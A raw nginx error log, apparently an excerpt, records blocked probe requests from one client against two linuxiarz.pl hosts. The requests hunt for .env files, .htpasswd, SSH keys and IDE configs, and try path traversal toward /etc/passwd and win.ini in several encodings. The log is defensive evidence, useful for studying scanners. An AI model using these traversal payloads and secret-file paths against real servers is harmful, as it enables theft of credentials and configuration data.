HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678400 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678401 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678402 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678404 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678405 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678406 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678407 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678410 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678411 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:42 [error] 3725719#3725719: *678412 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678413 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678414 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678415 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678417 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678418 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678419 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678420 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:43 [error] 3725719#3725719: *678421 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:40 [error] 3725719#3725719: *678612 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678619 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678620 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678621 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678622 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678623 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:42 [error] 3725719#3725719: *678624 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678625 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678626 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678630 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678635 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678636 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678637 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678638 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678642 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:43 [error] 3725719#3725719: *678645 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:44 [error] 3725719#3725719: *678647 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:44 [error] 3725719#3725719: *678648 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:04:54 [error] 3725719#3725719: *678685 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:07:42 [error] 3725719#3725719: *679322 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:08:28 [error] 3725719#3725719: *679548 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:09:10 [error] 3725719#3725719: *679741 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:09:15 [error] 3725719#3725719: *679781 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:09:24 [error] 3725719#3725719: *679830 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:10:01 [error] 3725719#3725719: *679974 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:10:57 [error] 3725719#3725719: *680226 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/06/07 14:18:20 [error] 3725719#3725719: *683049 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:28:41 [error] 3725719#3725719: *685162 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/14 05:55:41 [error] 292470#292470: *200450 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/06/16 20:05:41 [error] 292472#292472: *413920 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:42 [error] 292472#292472: *413926 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:44 [error] 292472#292472: *413946 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:46 [error] 292472#292472: *413966 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:51 [error] 292472#292472: *414016 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:53 [error] 292472#292472: *414028 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:53 [error] 292472#292472: *414032 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:55 [error] 292472#292472: *414053 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:55 [error] 292472#292472: *414055 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:05:58 [error] 292472#292472: *414083 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:08 [error] 292472#292472: *414171 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:12 [error] 292472#292472: *414226 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:13 [error] 292472#292472: *414238 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:16 [error] 292472#292472: *414266 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:18 [error] 292472#292472: *414280 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:18 [error] 292472#292472: *414284 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:19 [error] 292472#292472: *414292 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:19 [error] 292472#292472: *414294 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:28 [error] 292472#292472: *414390 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:31 [error] 292472#292472: *414414 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:32 [error] 292472#292472: *414426 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:35 [error] 292472#292472: *414454 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:37 [error] 292472#292472: *414466 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:38 [error] 292472#292472: *414472 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:38 [error] 292472#292472: *414476 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:39 [error] 292472#292472: *414482 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:54 [error] 292472#292472: *414616 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:57 [error] 292472#292472: *414646 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:06:58 [error] 292472#292472: *414658 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:07:00 [error] 292472#292472: *414671 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 20:07:04 [error] 292472#292472: *414711 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:33:41 [error] 1236#1236: *467 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:33:47 [error] 1236#1236: *497 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:34:19 [error] 1236#1236: *648 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:39:02 [error] 1236#1236: *966 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:40:03 [error] 1236#1236: *1056 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:43:52 [error] 1236#1236: *1402 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:53:37 [error] 1236#1236: *2004 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/06/16 23:57:24 [error] 1236#1236: *2263 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:24 [error] 1236#1236: *2264 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:28 [error] 1236#1236: *2265 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:28 [error] 1236#1236: *2266 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2267 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2268 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2269 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2270 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2271 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2272 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2273 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2274 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2275 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:29 [error] 1236#1236: *2276 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2277 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2278 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2279 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2280 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2281 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2282 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2283 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:57:30 [error] 1236#1236: *2284 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:04 [error] 1236#1236: *2299 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2303 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2304 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2305 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2306 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2307 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2308 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2309 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2310 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:05 [error] 1236#1236: *2311 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2313 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2314 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2315 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2316 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2318 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2319 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:08 [error] 1236#1236: *2320 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:09 [error] 1236#1236: *2321 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:10 [error] 1236#1236: *2322 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:34 [error] 1236#1236: *2337 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:34 [error] 1236#1236: *2338 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:34 [error] 1236#1236: *2340 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:34 [error] 1236#1236: *2341 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:34 [error] 1236#1236: *2342 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:35 [error] 1236#1236: *2343 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET 